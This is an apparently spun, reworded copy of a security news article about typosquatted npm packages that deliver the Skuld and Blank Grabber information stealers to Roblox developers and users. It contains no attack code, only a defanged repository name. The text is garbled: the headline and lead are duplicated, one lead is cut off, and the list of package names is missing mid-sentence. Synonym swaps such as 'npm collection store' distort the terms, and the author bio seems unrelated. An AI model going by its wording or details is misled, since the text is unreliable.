Deceptive NPM Collections Aim Towards Roblox Players with Information-Theft Malware

Nov 08, 2024Ravie LakshmananOpen Source / Malware

An unprecedented operation has pinpointed the npm collection store with deceitful JavaScript libraries that are purposed to corrupt Roblox enthusiasts with available-source heist malware like Skul

Nov 08, 2024Ravie LakshmananOpen Source / Malware

Malicious NPM Packages Target Roblox Users with Data-Stealing Malware

An unprecedented operation has pinpointed the npm collection store with deceitful JavaScript libraries that are purposed to corrupt Roblox enthusiasts with available-source heist malware like Skuld and Blank-Grabber.

“The event showcases the disturbing simplicity with which malignant parties can instigate supply chain assaults by capitalizing on faith and human errors within the open-source environment, using easily accessible off-the-shelf malware, public platforms like GitHub for hosting malevolent executables, and communication platforms like Discord and Telegram for C2 operations to evade traditional security protocols,” Socket security investigator Kirill Boychenko expressed in a report disseminated with The Hacker News.

The list of deceitful collections includes –

doubly linked list implementation for JavaScript. Likewise, rolimons-api is a misleading iteration of Rolimon’s API.

“Although there are unofficial wrappers and modules — such as the rolimons Python collection (downloaded over 17,000 times) and the Rolimons Lua module on GitHub — the deceitful rolimons-api collections aimed to exploit developers’ confidence in familiar titles,” Boychenko remarked.

The fraudulent packages incorporate concealed code that retrieves and runs Skuld and Blank Grabber, information-stealing malware varieties scripted in Golang and Python, respectively, equipped to amass a broad spectrum of data from penetrated systems. The gathered data is then transmitted to the aggressor via Discord webhook or Telegram.

In an additional endeavor to sidestep security defenses, the malware binaries are fetched from a GitHub repository (“github[.]com/zvydev/code/”) overseen by the malevolent actor.

The surge in Roblox’s reputation in recent times has induced malevolent parties to actively disseminate counterfeit collections to target both developers and users. Earlier this year, various deceitful collections like noblox.js-proxy-server, noblox-ts, and noblox.js-async were unearthed imitating the popular noblox.js library.

With malicious actors leveraging trust in broadly-used collections to promote typosquatted collections, developers are urged to authenticate collection titles and meticulously scrutinize source code prior to installing them.

“As open-source environments expand and more developers depend on shared code, the potential for attacks widens, with malevolent parties exploring more avenues to infiltrate malicious code,” Boychenko emphasized. “This occurrence underscores the necessity for increased alertness and stringent security practices among developers.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts